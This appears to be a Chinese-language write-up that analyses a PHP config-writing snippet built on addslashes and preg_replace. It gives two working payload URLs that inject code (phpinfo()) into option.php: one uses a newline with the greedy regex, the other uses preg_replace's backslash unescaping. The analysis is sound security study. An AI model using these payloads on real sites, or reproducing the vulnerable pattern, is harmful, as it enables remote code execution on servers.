p師傅的小密圈的一個問題
<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);
這個場景十分經典,常用在修改配置文件寫入,但是又需要做一定的防御。
法一(利用正則的.*、單引號):
http://love.lemon:82/test/test.php?option=aaa';%0aphpinfo();//
http://love.lemon:82/test/test.php?option=a
這個其實是利用了正則的匹配問題,因為仔細研究一下,可以看到正則匹配的是
$option='任意內容';
如果輸入aaaaa';xxxxx經過addslashes的單引號處理,成為\'
最后也就是$option='aaaaa\';xxxxx';
正則匹配的會是啥?=。=,其實最后還是能全部匹配到的,也就是aaaaa\';xxxxx';
當然最后通過注入了換行符突破,當然還需要再訪問一次
http://love.lemon:82/test/test.php?option=a
通過正則將\替換掉
法二(利用preg_replace的轉義):
http://love.lemon:82/test/test.php?option=aaa\';phpinfo();//
其中紅色的框框中是經過preg_replace替換后的$file
可以看到與一開始經過addslashes函數處理后的aa\\\'三個\變成了兩個\
猜測應該是preg_replace還是做了轉義的處理,導致如此的一個變化,所以最后寫入文件的也就是$option='aaa\\';phpinfo()//';